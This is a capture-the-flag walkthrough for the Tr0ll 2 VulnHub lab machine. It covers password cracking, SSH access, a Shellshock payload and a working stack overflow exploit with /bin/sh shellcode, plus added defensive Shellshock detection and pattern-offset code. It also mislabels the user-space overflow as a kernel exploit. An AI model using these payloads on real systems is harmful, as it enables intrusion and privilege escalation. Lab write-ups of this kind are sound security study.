Hello Everyone, let's begin
ctf link : https://www.vulnhub.com/entry/tr0ll-2,107/
download link : https://download.vulnhub.com/tr0ll/Tr0ll2.rar
I opened it in VMware on the interface named vmnet8 (172.16.59.0/24).
Note: Create a snapshot of the machine. You'll need it for sure.
CTF level : Intermediate
Vulnerabilities to exploit : Shellshock, Buffer Overflow
Techniques and tools : Nmap, ftp, strings, fcrackzip, Firefox, ssh, shell-storm
Total flags: 1
I found the IP using arp-scan
sudo arp-scan --interface vmnet8 --local
I found the IP of the CTF machine: 172.16.59.151.
I started by scanning the 1000 well-known ports and grabbing banners with nmap
sudo nmap -sSV 172.16.59.151
I first tried to fuzz the ftp service. I saw a message "Only noobs stay for a while..." there. So I tried a few login attempts with CTF-related terms and I was lucky. I found one:
Name : Tr0ll
Password : Tr0ll
After logging in, I found a file "lmao.zip". I downloaded that file.
mget lmao.zip
This zip file is password protected. Let's look into the http service to see if there's anything interesting.
There's one image. Let's look into robots.txt.
I saw images in a few of those links. So I started looking into the images and found something interesting in one image found at this link.
http://172.16.59.151/dont_bother/
strings cat_the_troll.jpg | tail
This message seems to be a clue. I just tried it as a URI path.
http://172.16.59.151/y0ur_self/
I downloaded answer.txt. This seems to be a wordlist.
wget http://172.16.59.151/y0ur_self/answer.txt
It was base64 encoded. I decoded it and also sorted it, keeping only unique entries.
base64 -d answer.txt | sort -u > troll.list
Now I have a wordlist and a password-protected zip file. Let's bruteforce it. I'm using fcrackzip.
fcrackzip lmao.zip -D -p troll.list -u
Found Password : ItCantReallyBeThisEasyRightLOL
Then I extracted the zip file using unzip
unzip -P ItCantReallyBeThisEasyRightLOL lmao.zip
A file named noob got extracted. I checked the filetype using file.
file noob
noob: PEM RSA private key
It's a private key. I should try ssh using the same key. I tried a few users related to the CTF, and I found that it is "noob" itself. But I see that there is still one problem.
ssh noob@172.16.59.151 -i noob
Is this the end?? NO, let's enumerate more. I wanted to know the kernel version. So I ran nmap again with an OS scan.
sudo nmap -O 172.16.59.151
This is a very old kernel. It might be vulnerable to SHELLSHOCK. I checked it and it was vulnerable to shellshock.
ssh noob@172.16.59.151 -i noob '() { :;}; /bin/bash'
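The shellshock check above is done by hand on the target. The following is an added example, not part of the original writeup, that shows the same thing from the defender's side: a self-test that tells you whether a local bash is still vulnerable to CVE-2014-6271, and a small scanner that flags the function-definition prefix "() {" in places where attacker-controlled values reach bash through the environment (HTTP headers on CGI hosts, the original command passed to a forced-command SSH key). The log records are constructed for the example; the `bash_is_vulnerable` helper assumes a `bash` binary on PATH and returns None if there is none.

```python
import os
import re
import subprocess

# CVE-2014-6271: bash imported any environment value starting with "() {" as a
# function definition and kept parsing (and executing) what followed the body.
# The prefix itself is the signature most IDS rules key on.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def bash_is_vulnerable(bash="bash"):
    """Run the standard self-test: export a crafted variable, run a harmless command.
    A patched bash prints only 'test'; an unpatched one also prints 'vulnerable'.
    Returns True/False, or None when bash cannot be executed here."""
    env = dict(os.environ, x="() { :;}; echo vulnerable")
    try:
        proc = subprocess.run([bash, "-c", "echo test"], env=env,
                              capture_output=True, text=True, timeout=5)
    except (FileNotFoundError, subprocess.TimeoutExpired, PermissionError):
        return None
    return "vulnerable" in proc.stdout


def looks_like_shellshock(value):
    """True if a header / command value carries the bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_records(records):
    """records: iterable of (source, value). Returns the flagged (source, value) pairs."""
    return [(src, val) for src, val in records if looks_like_shellshock(val)]


# Constructed sample records (not real logs): two benign, two carrying the prefix.
SAMPLE_RECORDS = [
    ("http User-Agent", "Mozilla/5.0 (X11; Linux x86_64)"),
    ("http User-Agent", "() { :; }; echo vulnerable"),
    ("ssh SSH_ORIGINAL_COMMAND", "() { :;}; /bin/bash"),
    ("ssh SSH_ORIGINAL_COMMAND", "ls -la"),
]

if __name__ == "__main__":
    print("local bash vulnerable:", bash_is_vulnerable())
    for src, val in scan_records(SAMPLE_RECORDS):
        print(f"flagged [{src}]: {val!r}")
```

The forced-command path is the one the writeup abuses: when an authorized key restricts a login to a fixed command, sshd still exports the client-supplied command in SSH_ORIGINAL_COMMAND, and an unpatched bash run as that forced command imports it. Patching bash closes the hole; logging and alerting on the prefix tells you whether anyone tried.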
I got a shell but it wasn't interactive. I spawned a tty shell using python
python -c 'import pty;pty.spawn("/bin/bash");'
I kept traversing through directories and I found something interesting in /nothing_to_see_here/choose_wisely.
cd /nothing_to_see_here/choose_wisely
I looked into every folder. There was an executable file "r00t" in every folder. I decided to test door3 first. I ran the r00t file and it printed how to use it. But what can we do after all?? Buffer Overflow....right. Let's check if I can exploit the kernel stack.
./r00t
Usage: ./r00t input
I tried to input 1000 characters and I saw a segmentation fault. This is a happy moment. The kernel is exploitable.
Note: If you see your machine start behaving unusually at the time of the kernel exploit, restore it to its initial snapshot.
./r00t $(python -c 'print "A"*1000')
Now it's time to find the offset. I am going to use ./pattern_create.rb and ./pattern_offset.rb. These are metasploit-framework tools. If you are using Kali, they are already installed in the system.
cd /usr/share/metasploit-framework/tools/exploit
./pattern_create.rb -l 1000
Now I looked for gdb. It was installed. If it wasn't, I would have had to fetch the binary to my machine, recreate the same environment and write the exploit there. But because it is already present, I'll use it.
gdb ./r00t
I ran the file with the pattern_create.rb output
r [unique pattern from pattern_create.rb]
It gave me the four pattern bytes that landed in EIP. Now I have to find the offset (size of buffer + EBP + padding). I used pattern_offset.rb
./pattern_offset.rb -q 0x6a413969
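The two Ruby tools above are short enough to reimplement, and doing so shows exactly where the 268 in the final command comes from. This is an added example, not code from the writeup or from Metasploit: it generates the same "Aa0Aa1Aa2..." cyclic pattern, converts the EIP value gdb reported into the little-endian byte string that x86 actually stored, and looks that string up in the pattern. The query value 0x6a413969 is the one from the writeup; everything else is constructed.

```python
import string
import struct


def pattern_create(length):
    """Cyclic pattern of the given length: every Upper+lower+digit triple is unique,
    so any 4 contiguous bytes pinpoint one position (same scheme as pattern_create.rb)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    # 26*26*10 triples = 20280 bytes is the scheme's maximum
    return "".join(chunks)[:length]


def eip_to_pattern_bytes(eip_value):
    """x86 is little-endian, so EIP=0x6a413969 means the bytes 69 39 41 6a ('i9Aj')
    were written in that order; pack the value to recover the original substring."""
    return struct.pack("<I", eip_value).decode("ascii", errors="replace")


def pattern_offset(eip_value, length=1000):
    """Offset of the 4 bytes now in EIP from the start of the input, or None if the
    value did not come from the pattern (e.g. a crash that corrupted something else)."""
    needle = eip_to_pattern_bytes(eip_value)
    idx = pattern_create(length).find(needle)
    return idx if idx != -1 else None


if __name__ == "__main__":
    # With offset 268, bytes 268..271 of the input are what the saved EIP is overwritten with,
    # which is why the writeup's final command pads with exactly 268 'A's before the address.
    print(eip_to_pattern_bytes(0x6A413969))  # i9Aj
    print(pattern_offset(0x6A413969))        # 268
```

Reading it back: the triple "Ai9" is the 90th (index 89) in the sequence, so it starts at byte 267; the 4 bytes gdb showed, "i9Aj", therefore begin at 268, and the saved return address sits at input bytes 268 through 271. A value that does not map back into the pattern (a plain 0x41414141 from an all-'A' run, for instance) returns None, which is the cue that the crash was somewhere other than the return address.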
I found the offset size here. Now I have to know ESP, which I tried to get earlier. But I wanted to check whether ESP would change if I reduced the payload size. So I fuzzed with 269 bytes once again in gdb.
r $(python -c 'print "A"*269')
This time I see a different ESP. And it is obvious: the input size is different. I also checked whether the address pointed to by ESP is empty or partially filled. If I send a 268-byte buffer it gets filled up to 4 bytes. So I used the next stack address, 0xbffffb80.
Now it's time for the payload. I looked on shell-storm for the smallest /bin/sh shellcode and I found a nice one: Linux/x86 - execve /bin/sh shellcode - 23 bytes by Hamza Megahed.
I had the offset, ESP and the shell payload. Now I had to fuzz for the number of NOPs required. So I started with a single NOP and increased in multiples of 2. And I got it working. The final command for privilege escalation:
./r00t $(python -c "print 'A'*268 + '\x80\xfb\xff\xbf' + '\x90' * 4 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'")
Finally found the flag.